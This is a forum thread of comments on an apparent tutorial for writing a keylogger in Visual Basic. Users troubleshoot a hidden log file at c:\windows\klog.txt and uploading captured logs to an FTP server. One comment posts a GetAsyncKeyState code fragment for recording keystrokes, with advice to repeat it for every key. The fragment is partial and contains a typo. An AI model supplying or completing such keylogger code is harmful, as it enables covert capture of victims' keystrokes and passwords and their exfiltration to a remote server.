I've done everything as instructed, re-reading the steps at least 5 times. Having done everything as I should have,
I hit the debug button like you instructed and i brought up Notepad, type miscellaneous junk such as "dfsdf sadf !@#$@#42312"
and waited 5 minutes (but in the coding i used an interval of suggested timing).
I tried this twice, one without saving the text, the other with saving the txt file.
after which I went to the designated path "c:\windows\klog.txt"
funny enough it wasn't there both times. I tried changing the path, and the name. neither worked, so I reverted it back to normal.
Now..my question is....what could I have possibly have done wrong?
Heres the code I typed in...mabey I made a mistake, but I doubt it.
I noticed on a few bits in your code you missed out a couple of bit an example from your code was this

u:You have used Label.Caption instead of Label1.Caption a good few times, also he said in tut to change the GoTo to something else 👍 not picking faults as im far from good at this but hope this might make a difference and pssssst i've still not got it going yet as i am just learning

Hi everybody and thank u mathias for this great tut.Seems though that i got a problem uploadin the log text file to my ftp server.Any suggestion?i've tried 2 different ftp servers and when im tryin to upload somethin else on the ftp everything goes normal..Anyway ty again :))

^^^^^^^this is an example in the tut, it goes in in timer1 you should start with this for keystroke "a" (65)
If GetAsyncKeyState(65) <> 0 Then
If shift = True Then
Label1.Caption = Label.Caption + "A"
shift = False
GoTo b
End If
Label1.Caption = Label1.Caption + "a"
End If
b:
you will need to repeat this for every letter and numbers 0-1 hope this helps :thumbsup
